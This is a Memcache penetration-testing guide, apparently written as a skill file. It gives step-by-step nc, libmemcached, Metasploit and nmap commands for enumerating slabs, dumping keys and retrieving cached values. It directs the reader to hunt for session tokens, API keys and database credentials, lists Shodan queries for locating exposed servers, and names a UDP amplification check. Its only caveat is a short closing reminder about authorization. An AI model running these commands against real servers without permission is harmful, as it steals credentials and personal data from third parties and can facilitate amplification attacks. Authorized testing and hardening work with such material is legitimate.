Memcache Pentesting

Memcache is a distributed memory caching system often exposed without authentication. This skill guides you through enumerating and extracting data from Memcache instances.

Quick Start

# Basic version check
echo "version" | nc -vn -w 1 <IP> 11211

# Get stats and slab information
echo "stats" | nc -vn -w 1 <IP> 11211
echo "stats slabs" | nc -vn -w 1 <IP> 11211
echo "stats items" | nc -vn -w 1 <IP> 11211

Enumeration Workflow

Step 1: Initial Reconnaissance

Start by checking if Memcache is accessible and gathering basic information:

# Check version
echo "version" | nc -vn -w 1 <IP> 11211

# Get general stats
echo "stats" | nc -vn -w 1 <IP> 11211

# Get slab information (memory organization)
echo "stats slabs" | nc -vn -w 1 <IP> 11211

# Get item statistics per slab
echo "stats items" | nc -vn -w 1 <IP> 11211

Step 2: Identify Active Slabs

From

stats slabs

output, identify slabs with

active

items > 0. These contain cached data.

Step 3: Dump Keys from Active Slabs

For each active slab class, dump the keys:

# For Memcache < 1.4.31
echo "stats cachedump <slab_number> 0" | nc -vn -w 1 <IP> 11211

# For Memcache >= 1.4.31 (non-blocking mode)
echo "lru_crawler metadump all" | nc -vn -w 1 <IP> 11211

Step 4: Extract Data

Once you have key names, retrieve the actual data:

echo "get <key_name>" | nc -vn -w 1 <IP> 11211

Automated Tools

Using libmemcached-tools

# Install tools
sudo apt install libmemcached-tools

# Get stats
memcstat --servers=<IP>

# Dump all items
memcdump --servers=<IP>

# Get specific items
memccat --servers=<IP> <key1> <key2>

Using Metasploit

# Extract saved data
msfconsole
use auxiliary/gather/memcached_extractor
set RHOSTS <IP>
run

# Check for UDP amplification vulnerability
use auxiliary/scanner/memcached/memcached_amp
set RHOSTS <IP>
run

Using Nmap

# Gather Memcache information
nmap -n -sV --script memcached-info -p 11211 <IP>

Key Concepts

Slab Classes

Memcache organizes data into slab classes based on item size. Each slab class has:

• chunk size: Size of each item slot
• perslab: Number of chunks per slab
• active: Number of currently used chunks
• get_hits/misses: Cache efficiency metrics

Important Limitations

1. 1MB Data Limit: Prior to Memcache 1.4, objects larger than 1MB cannot be stored
2. Timeout Maximum: Never set timeout > 2592000 seconds (30 days), or Memcache treats it as a Unix timestamp
3. Cachedump Limit: Only 1MB of keys can be dumped per slab class
4. No Authentication: Most instances are exposed without authentication
5. Ephemeral Data: Cache data may appear and disappear as it's evicted

Common Use Cases

Finding Sensitive Data

Look for keys containing:

• Session tokens
• API keys
• Database credentials
• User data
• Configuration values

Assessing Cache Efficiency

From

stats items

output:

• High

  evicted

  count indicates memory pressure

• get_hits

  vs

  get_misses

  ratio shows cache effectiveness

• expired

  count shows data lifecycle

Troubleshooting

Keys Disappearing

If keys disappear after

incr

operations, they may have overflowed. Recreate them with

add

or

set

.

Connection Issues

# Test connectivity
telnet <IP> 11211

# Check if port is open
nmap -p 11211 <IP>

Large Datasets

For datasets larger than 1MB per slab:

• Use

  peep

  tool (warning: may freeze Memcache in production)
• Use

  lru_crawler metadump all

  for Memcache 1.4.31+
• Iterate through slab classes manually

Shodan Queries

For finding exposed Memcache instances:

port:11211 "STAT pid"
"STAT pid"

Security Considerations

• Authorization: Only test systems you have permission to assess
• Data Sensitivity: Cached data may contain PII, credentials, or sensitive information
• Production Impact: Some tools (like

  peep

  ) can freeze Memcache processes
• Compliance: Ensure testing complies with organizational policies and regulations

References

• Memcached Cheat Sheet
• Memcached Wikipedia
• Memcached Release Notes 1.4.31